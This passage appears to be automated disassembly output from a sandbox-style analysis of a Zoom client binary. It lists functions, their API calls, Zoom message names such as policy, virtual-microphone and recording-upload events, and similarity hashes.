                • ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@II@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.framework.policy.init_user,0000753B,packed_settings,config_source,policy_scene,00000004), ref: 00C6C1EB
                  • Part of subcall function 00C8BC00: __EH_prolog3.LIBCMT ref: 00C8BC07
                  • Part of subcall function 00C8BC00: ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@I@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C6C0E0,com.zoom.app.framework.policy.updated,0000753A,packed_settings,config_source,policy_scene,00000004), ref: 00C8BC1D
                  • Part of subcall function 00C8BCC0: __EH_prolog3_GS.LIBCMT ref: 00C8BCC7
                  • Part of subcall function 00C8BCC0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C108,com.zoom.app.framework.policy.updated), ref: 00C8BCE1
                  • Part of subcall function 00C8BCC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000044), ref: 00C8BD0F
                  • Part of subcall function 00C8BCC0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C8BD4C
                  • Part of subcall function 00C8BCC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?), ref: 00C8BD7C
                  • Part of subcall function 00C8BCC0: EnterCriticalSection.KERNEL32(00000044), ref: 00C8BDEE
                  • Part of subcall function 00C8BCC0: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C8BE0B
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@Tree
                • String ID: com.zoom.app.framework.policy.init_user$config_source$packed_settings$policy_scene
                • API String ID: 2152042629-3030442605
                • Opcode ID: a1e49d80d3e00bf7cf8f6585e2b73785024984ee0555f98172e1e8a0f1e8c1d1
                • Instruction ID: 8435f222b0acf167941d869d6b2e399774883c54954e00ef572595d5b6f2e17e
                • Opcode Fuzzy Hash: a1e49d80d3e00bf7cf8f6585e2b73785024984ee0555f98172e1e8a0f1e8c1d1
                • Instruction Fuzzy Hash: 57E092B1A80744BBC3107B145C9A77E76A05B60F56F414129F1046A3E1CBF88E4997B6
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70307
                • ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@H_J@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.virtual.microphone.create.request,00009CF4,deviceName,deviceGUID,audioCapture,00000004), ref: 00C7032A
                  • Part of subcall function 00C90DE0: __EH_prolog3.LIBCMT ref: 00C90DE7
                  • Part of subcall function 00C90DE0: ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C7032F,com.zoom.app.assistant.sip.virtual.microphone.create.request,00009CF4,deviceName,deviceGUID,audioCapture,00000004), ref: 00C90DFD
                  • Part of subcall function 00C90EA0: __EH_prolog3_GS.LIBCMT ref: 00C90EA7
                  • Part of subcall function 00C90EA0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C70356), ref: 00C90EBB
                  • Part of subcall function 00C90EA0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.virtual.microphone.create.request,00000044), ref: 00C90EED
                  • Part of subcall function 00C90EA0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C90F2A
                  • Part of subcall function 00C90EA0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.virtual.microphone.create.request,?), ref: 00C90F5C
                  • Part of subcall function 00C90EA0: EnterCriticalSection.KERNEL32(00000044), ref: 00C90FCE
                  • Part of subcall function 00C90EA0: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C90FEB
                Strings
                • deviceName, xrefs: 00C7031B
                • deviceGUID, xrefs: 00C70316
                • com.zoom.app.assistant.sip.virtual.microphone.create.request, xrefs: 00C70325
                • audioCapture, xrefs: 00C70311
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@Tree
                • String ID: audioCapture$com.zoom.app.assistant.sip.virtual.microphone.create.request$deviceGUID$deviceName
                • API String ID: 2152042629-4234925160
                • Opcode ID: 61a483dd095d24025b49145037278e5a66e7a04c8ec2f47740b8cf3ff775dc6d
                • Instruction ID: 287c6dc9f12f2bb27ddd45257684f8b68c4bfc09b65cbbd24764c785f98bb344
                • Opcode Fuzzy Hash: 61a483dd095d24025b49145037278e5a66e7a04c8ec2f47740b8cf3ff775dc6d
                • Instruction Fuzzy Hash: 0EE0D871A40380EFE7107B589C0B72F3AA0AF40B55F608428B1445A2E2CBF40A8CD7F1
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68317
                • ??0?$CmmMessageTemplate_3@IV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand,00000004), ref: 00C6833A
                  • Part of subcall function 00C85A10: __EH_prolog3.LIBCMT ref: 00C85A17
                  • Part of subcall function 00C85A10: ??0?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C6833F,com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand,00000004), ref: 00C85A2D
                  • Part of subcall function 00C85BFD: __EH_prolog3_GS.LIBCMT ref: 00C85C04
                  • Part of subcall function 00C85BFD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C68366), ref: 00C85C18
                  • Part of subcall function 00C85BFD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.start,00000044), ref: 00C85C4A
                  • Part of subcall function 00C85BFD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C85C87
                  • Part of subcall function 00C85BFD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.start,?), ref: 00C85CB9
                  • Part of subcall function 00C85BFD: EnterCriticalSection.KERNEL32(00000044), ref: 00C85D2B
                  • Part of subcall function 00C85BFD: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C85D48
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@TreeV12@@
                • String ID: ProcessID$ProcessName$RecoveryCommand$com.Zoom.app.conf.start
                • API String ID: 1039806498-1322262537
                • Opcode ID: 3163a9c255b2da87680efddd1ebbf6728b679ca61719b8480b193964095cc432
                • Instruction ID: d9c5c4da2d4151ef6cef0c7833e9af13bbbb03ee85e1e3949661de919b00c856
                • Opcode Fuzzy Hash: 3163a9c255b2da87680efddd1ebbf6728b679ca61719b8480b193964095cc432
                • Instruction Fuzzy Hash: CFE09270A80B406FE3117B58AC8672D7690BB10B65F90052CB2006A3D6CBF00548DBB6
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76777
                • ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@IV12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.ps.asyncrecording.upload_result,0001388E,recording_id,action_type,web_record_info,00000004), ref: 00C7679A
                  • Part of subcall function 00C869F0: __EH_prolog3.LIBCMT ref: 00C869F7
                  • Part of subcall function 00C869F0: ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C868F5,?,?,?,?,?,00000004,00C7F6C8,?,?,?), ref: 00C86A0D
                  • Part of subcall function 00C95C82: __EH_prolog3_GS.LIBCMT ref: 00C95C89
                  • Part of subcall function 00C95C82: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C767C6), ref: 00C95C9D
                  • Part of subcall function 00C95C82: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.ps.asyncrecording.upload_result,00000044), ref: 00C95CCF
                  • Part of subcall function 00C95C82: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C95D0C
                  • Part of subcall function 00C95C82: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.ps.asyncrecording.upload_result,?), ref: 00C95D3E
                  • Part of subcall function 00C95C82: EnterCriticalSection.KERNEL32(00000044), ref: 00C95DB0
                  • Part of subcall function 00C95C82: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C95DCD
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@TreeV12@@
                • String ID: action_type$com.zoom.ps.asyncrecording.upload_result$recording_id$web_record_info
                • API String ID: 288908543-3761408375
                • Opcode ID: 077da848706378128537f1c67a35ed814a948aecf915fc095cde71eff17095fc
                • Instruction ID: 274d6216e44ddf4ab96779360197d1eeffee642b28d5ff21e8b57b4a78c4526d
                • Opcode Fuzzy Hash: 077da848706378128537f1c67a35ed814a948aecf915fc095cde71eff17095fc
                • Instruction Fuzzy Hash: F8E0D8F1644750AFD7247F98884A75D3690A704F19F44415CB2041A2D1CBF00648D7BA
                APIs
                • __EH_prolog3.LIBCMT ref: 00C688B7
                • ??0?$CmmMessageTemplate_3@H_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.pt.upload.feedback,00002756,MsgID,Options,AdditionalInfo,00000004), ref: 00C688DA
                  • Part of subcall function 00C864E0: __EH_prolog3.LIBCMT ref: 00C864E7
                  • Part of subcall function 00C864E0: ??0?$CmmMessageTemplate_2@H_J@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C688DF,com.Zoom.app.pt.upload.feedback,00002756,MsgID,Options,AdditionalInfo,00000004), ref: 00C864FD
                  • Part of subcall function 00C86757: __EH_prolog3_GS.LIBCMT ref: 00C8675E
                  • Part of subcall function 00C86757: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C68906), ref: 00C86772
                  • Part of subcall function 00C86757: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.upload.feedback,00000044), ref: 00C867A4
                  • Part of subcall function 00C86757: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C867E1
                  • Part of subcall function 00C86757: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.upload.feedback,?), ref: 00C86813
                  • Part of subcall function 00C86757: EnterCriticalSection.KERNEL32(00000044), ref: 00C86885
                  • Part of subcall function 00C86757: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C868A2
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@Tree
                • String ID: AdditionalInfo$MsgID$Options$com.Zoom.app.pt.upload.feedback
                • API String ID: 3448419098-506818149
                • Opcode ID: f4a6160dbe1b188a53bb48fd07a709e81f3a86d5e1d9670965bf15bc1dd249f2
                • Instruction ID: 3bab554ce1c987ee8808d1c63302cad02be33425bb0a852b79f139b1eff840e0
                • Opcode Fuzzy Hash: f4a6160dbe1b188a53bb48fd07a709e81f3a86d5e1d9670965bf15bc1dd249f2
                • Instruction Fuzzy Hash: 65E0D8B5A40B909BD7217B64AC0A72C7260AB00B59F90096CB2145A3D1CFF4055CDBB6
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A9F7
                • ??0?$CmmMessageTemplate_3@_JV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.conf.notifysavechat,00002746,MeetingNo,MeetingTopic,Path,00000004), ref: 00C6AA1A
                  • Part of subcall function 00C896C0: __EH_prolog3.LIBCMT ref: 00C896C7
                  • Part of subcall function 00C896C0: ??0?$CmmMessageTemplate_2@_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C895C5,?,?,?,?,?,00000004,00C7D4D8,?,?,?), ref: 00C896DD
                  • Part of subcall function 00C89B09: __EH_prolog3_GS.LIBCMT ref: 00C89B10
                  • Part of subcall function 00C89B09: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6AA46), ref: 00C89B24
                  • Part of subcall function 00C89B09: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifysavechat,00000044), ref: 00C89B56
                  • Part of subcall function 00C89B09: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C89B93
                  • Part of subcall function 00C89B09: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifysavechat,?), ref: 00C89BC5
                  • Part of subcall function 00C89B09: EnterCriticalSection.KERNEL32(00000044), ref: 00C89C37
                  • Part of subcall function 00C89B09: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C89C54
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@_Template_3@_TreeV12@@
                • String ID: MeetingNo$MeetingTopic$Path$com.Zoom.app.conf.notifysavechat
                • API String ID: 3464435262-1826636458
                • Opcode ID: d3300cda715a05ecf2ca1d5f11742e3ff3d9d0218527690cb40ad9ad14350a29
                • Instruction ID: e180ab0b4925a1d37dcc8a2d8b263e4336488c88313295b074819bdcd17159d2
                • Opcode Fuzzy Hash: d3300cda715a05ecf2ca1d5f11742e3ff3d9d0218527690cb40ad9ad14350a29
                • Instruction Fuzzy Hash: 54E09A70A40740ABDB207B98BD4A72D7AA0AF00B19F540458F1106A3E2CBF00908EA7A
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74907
                • ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@_J@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.conf.invite.buddy.to.meeting,0000277F,UserID,MeetingID,MeetingNum,00000004), ref: 00C7492A
                  • Part of subcall function 00C93CF0: __EH_prolog3.LIBCMT ref: 00C93CF7
                  • Part of subcall function 00C93CF0: ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C7492F,com.Zoom.app.conf.invite.buddy.to.meeting,0000277F,UserID,MeetingID,MeetingNum,00000004), ref: 00C93D0D
                  • Part of subcall function 00C93DB3: __EH_prolog3_GS.LIBCMT ref: 00C93DBA
                  • Part of subcall function 00C93DB3: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C74956), ref: 00C93DCE
                  • Part of subcall function 00C93DB3: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.invite.buddy.to.meeting,00000044), ref: 00C93E00
                  • Part of subcall function 00C93DB3: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C93E3D
                  • Part of subcall function 00C93DB3: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.invite.buddy.to.meeting,?), ref: 00C93E6F
                  • Part of subcall function 00C93DB3: EnterCriticalSection.KERNEL32(00000044), ref: 00C93EE1
                  • Part of subcall function 00C93DB3: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C93EFE
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@TreeV12@@V12@_
                • String ID: MeetingID$MeetingNum$UserID$com.Zoom.app.conf.invite.buddy.to.meeting
                • API String ID: 304435404-3353022223
                • Opcode ID: 15f83f4f65b801a33e4d6e458efed56c487d0a3d8648665696efe301327ad0f0
                • Instruction ID: 18920082882ba4a8c67e469dad3b88e37a33e33362371a8d404dfbf28510b693
                • Opcode Fuzzy Hash: 15f83f4f65b801a33e4d6e458efed56c487d0a3d8648665696efe301327ad0f0
                • Instruction Fuzzy Hash: E8E092B1A447906ADB00BB55DC0A72972709B00B15F508528F6141A2D5CBF40648DAB2
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6EDA7
                • ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.indentify.device.response,00009DDB,deviceID,deviceType,result,00000004), ref: 00C6EDCA
                  • Part of subcall function 00C8EA00: __EH_prolog3.LIBCMT ref: 00C8EA07
                  • Part of subcall function 00C8EA00: ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@I@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C8E925,?,?,?,?,?,00000004,00C7B838,?,?,?), ref: 00C8EA1D
                  • Part of subcall function 00C8EF56: __EH_prolog3_GS.LIBCMT ref: 00C8EF5D
                  • Part of subcall function 00C8EF56: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6EDF6), ref: 00C8EF71
                  • Part of subcall function 00C8EF56: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.indentify.device.response,00000044), ref: 00C8EFA3
                  • Part of subcall function 00C8EF56: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C8EFE0
                  • Part of subcall function 00C8EF56: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.indentify.device.response,?), ref: 00C8F012
                  • Part of subcall function 00C8EF56: EnterCriticalSection.KERNEL32(00000044), ref: 00C8F084
                  • Part of subcall function 00C8EF56: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C8F0A1
                Strings
                • com.zoom.app.assistant.virtualaudio.message.indentify.device.response, xrefs: 00C6EDC5
                • result, xrefs: 00C6EDB1
                • deviceID, xrefs: 00C6EDBB
                • deviceType, xrefs: 00C6EDB6
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@Tree
                • String ID: com.zoom.app.assistant.virtualaudio.message.indentify.device.response$deviceID$deviceType$result
                • API String ID: 2152042629-2938886702
                • Opcode ID: f776b7a7f31a7752a31271fa4652f81fe6c44da559a807697c416b3610a32992
                • Instruction ID: 43d9a260c7202fc8d1bc3e2c6b0cfa55fdbd10413eb4254d741fb7b225808c66
                • Opcode Fuzzy Hash: f776b7a7f31a7752a31271fa4652f81fe6c44da559a807697c416b3610a32992
                • Instruction Fuzzy Hash: B7E0D871B81790ABD710BF944C0772D3660AB00B98F40485DB2101A7D1CBF44508F77E
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76D67
                • ??0?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.conf.start.download.component,000027B2,componentType,requestID,isForce,00000004), ref: 00C76D8A
                  • Part of subcall function 00C95FE0: __EH_prolog3.LIBCMT ref: 00C95FE7
                  • Part of subcall function 00C95FE0: ??0?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C76D8F,com.Zoom.conf.start.download.component,000027B2,componentType,requestID,isForce,00000004), ref: 00C95FFD
                  • Part of subcall function 00C960A0: __EH_prolog3_GS.LIBCMT ref: 00C960A7
                  • Part of subcall function 00C960A0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C76DB6), ref: 00C960BB
                  • Part of subcall function 00C960A0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.conf.start.download.component,00000044), ref: 00C960ED
                  • Part of subcall function 00C960A0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C9612A
                  • Part of subcall function 00C960A0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.conf.start.download.component,?), ref: 00C9615C
                  • Part of subcall function 00C960A0: EnterCriticalSection.KERNEL32(00000044), ref: 00C961CE
                  • Part of subcall function 00C960A0: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C961EB
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@Tree
                • String ID: com.Zoom.conf.start.download.component$componentType$isForce$requestID
                • API String ID: 111817187-4212277253
                • Opcode ID: aa3b912e027dcda85135ee0ca20dbd7cee8fe586f99551db395a2e7b9b053d19
                • Instruction ID: 013422d16fc2d97efa25fdfc3cabc17646b10570305956eab9ad1dac244cbc93
                • Opcode Fuzzy Hash: aa3b912e027dcda85135ee0ca20dbd7cee8fe586f99551db395a2e7b9b053d19
                • Instruction Fuzzy Hash: BBE0D8B1744744ABDF21BBA9DC4F75D76B09B04B58F80846DF5045A2C2CBF00908DB79
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CB65C5
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000000,?,000000E8,00CB73B3,?,?,?,?,?,?,?,?,?), ref: 00CB664B
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,?,00000000,?,000000E8,00CB73B3,?,?,?,?,?,?,?,?), ref: 00CB665D
                • ??H?$CStringT@D@Cmm@@QBE?AV01@ABV01@@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000000,?,000000E8,00CB73B3,?,?,?,?,?,?), ref: 00CB6683
                Similarity
                • API ID: Cmm@@StringV01@@$??0?$$H_prolog3_V01@
                • String ID:
                • API String ID: 469307732-0
                • Opcode ID: 45fefa41ce692b471f5e4c5ca41fe7a9a778cdd48c23ef79975859943a5229f7
                • Instruction ID: 2e494c3b2d96810241bb6989f30043d4c779f0919d9a667d9ea46e53abb14a56
                • Opcode Fuzzy Hash: 45fefa41ce692b471f5e4c5ca41fe7a9a778cdd48c23ef79975859943a5229f7
                • Instruction Fuzzy Hash: B7515D75900219AFCB25DF60C991AEEB3B8FF14304F1084AAE856B7251DF34AE49DF60
                APIs
                • __EH_prolog3.LIBCMT ref: 00C62E5A
                • ?cmm_fs_read@@YAHPB_WAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(?,?,000000D8), ref: 00C62E66
                  • Part of subcall function 00C62D90: __EH_prolog3_GS.LIBCMT ref: 00C62D97
                  • Part of subcall function 00C62D90: ?GetSize@CFile@Cmm@@QBE_KXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DE5
                  • Part of subcall function 00C62D90: ?GetBuffer@?$CStringT@D@Cmm@@QAEPADI@Z.RWSNDPQSKZ(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DEF
                  • Part of subcall function 00C62D90: ?Read@CFile@Cmm@@QAEIPAXI@Z.RWSNDPQSKZ(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DF8
                  • Part of subcall function 00C62D90: ?Close@CFile@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62E34
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00000000,00000002,00000001), ref: 00C62EB6
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?), ref: 00C62F07
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,00000000), ref: 00C62F49
                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00C62FAE
                Similarity
                • API ID: Cmm@@$File@State@Unlock@$?cmm_fs_read@@Buffer@?$Close@D@2@@std@@@D@std@@H_prolog3H_prolog3_Ios_base_dtorRead@Size@StringU?$char_traits@V?$allocator@V?$basic_string@std::ios_base::_
                • String ID:
                • API String ID: 3644761214-0
                • Opcode ID: 803ce419cf4fb486c6b9881fac0e19f9e338be14d2c79f9c74d167e93cfe6dc3
                • Instruction ID: 55d8960a49632a2ed495e20c903058fd80133e15145b2683fc8294cb1ac00a47
                • Opcode Fuzzy Hash: 803ce419cf4fb486c6b9881fac0e19f9e338be14d2c79f9c74d167e93cfe6dc3
                • Instruction Fuzzy Hash: FF413931D0062A9BCF20DFA8C981ADDB7B5FF08314F1481AAE515B7241DB70AE45CFA1
                APIs
                • __EH_prolog3.LIBCMT ref: 00CE2366
                  • Part of subcall function 00CDC00B: GetProcessHeap.KERNEL32(?,00000000,00CDD955,00000004,00CDD727,00DFFBA8,?,?,?,?,00CDCB1F,00DFFB90,?), ref: 00CDC037
                  • Part of subcall function 00CDCE9E: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,?,80004005,?,?,?,80070057,?,00CDCCE1,00000000,?,?,80070057,00000000), ref: 00CDCEB4
                • _wcschr.LIBVCRUNTIME ref: 00CE238F
                • _wcschr.LIBVCRUNTIME ref: 00CE23BF
                • CreateDirectoryW.KERNEL32(?,00000000,00000000,00000000,00000008,00CE0EEA,?,00000000,0000000C,80070057,?,?), ref: 00CE2412
                • GetLastError.KERNEL32(?,00000000,0000000C,80070057,?,?), ref: 00CE241C
                • GetFileAttributesW.KERNEL32(?,?,00000000,0000000C,80070057,?,?), ref: 00CE242A
                Similarity
                • API ID: _wcschr$AttributesCmm@@CreateDirectoryErrorFileH_prolog3HeapLastProcessState@Unlock@
                • String ID:
                • API String ID: 3223584605-0
                • Opcode ID: 3585de6667388023143ceda400958a7852f19dc8e4f14003ef3db301b76da0a2
                • Instruction ID: e01bec1174c64e1a96782a54b054a9fc3f2c9bea734da3ca8310b4b601eb5c0c
                • Opcode Fuzzy Hash: 3585de6667388023143ceda400958a7852f19dc8e4f14003ef3db301b76da0a2
                • Instruction Fuzzy Hash: 963138325006859BDB19DBA9CC95BED776CAF50324F20421EF126972D1DF30AA05DB51
                APIs
                • ?SealElementIfJustOpened@XMLPrinter@tinyxml2@@IAEXXZ.RWSNDPQSKZ ref: 00CB2EA8
                  • Part of subcall function 00CB3270: ?Putc@XMLPrinter@tinyxml2@@IAEXD@Z.RWSNDPQSKZ(0000003E,00CB35AB,?,?,00CB2E8C,xml version="1.0"), ref: 00CB327C
                • ?Putc@XMLPrinter@tinyxml2@@IAEXD@Z.RWSNDPQSKZ(0000000A), ref: 00CB2F24
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?), ref: 00CB2F33
                • ?Write@XMLPrinter@tinyxml2@@IAEXPBDI@Z.RWSNDPQSKZ(00D333A0,00000001), ref: 00CB2F46
                • ?Write@XMLPrinter@tinyxml2@@IAEXPBD@Z.RWSNDPQSKZ(?,00D333A0,00000001), ref: 00CB2F4E
                Similarity
                • API ID: Printer@tinyxml2@@$Putc@Write@$Cmm@@ElementJustOpened@SealState@Unlock@
                • String ID:
                • API String ID: 2363765950-0
                • Opcode ID: 7a6723998683841eb857a0c41d6520c26ef88275d1670b49f04fb273f24f7f40
                • Instruction ID: c7820e0d96aa403fc1e05576901a7ec78db41d868841ebb590f3ec4b32895bf7
